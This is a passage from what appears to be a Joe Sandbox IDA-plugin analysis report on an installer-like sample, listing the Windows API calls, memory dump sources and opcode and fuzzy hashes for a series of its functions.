                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                          • String ID: isRS-$isRS-???.tmp
                                                                          • API String ID: 134685335-3422211394
                                                                          • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                          • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                          • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                          • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                          • API String ID: 2238633743-1050967733
                                                                          • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                          • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                          • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                          • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                          APIs
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                          • SetForegroundWindow.USER32(?), ref: 00456841
                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                          Strings
                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                          • API String ID: 2236967946-3182603685
                                                                          • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                          • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                          • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                          • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                          • API String ID: 1646373207-3712701948
                                                                          • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                          • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                          • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                          • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID: ,
                                                                          • API String ID: 568898626-3772416878
                                                                          • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                          • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                          • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                          • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                          • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                          • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                          • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                          • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                          • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                          • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                          • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                          • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                          • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                          • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                          • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00481CEE
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                          • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                          • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                          • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                          • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                          • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                          • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                          • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241F4
                                                                          • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                            • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023325AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                          • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                          • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                          • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                          • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                          • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                          • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                          • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                          • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                          • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                          • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241AB
                                                                            • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                            • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                            • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                            • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                          • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                          • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                          • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                          • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                          • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                          • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                          • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                          • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                          • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                          • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                          • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                          • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
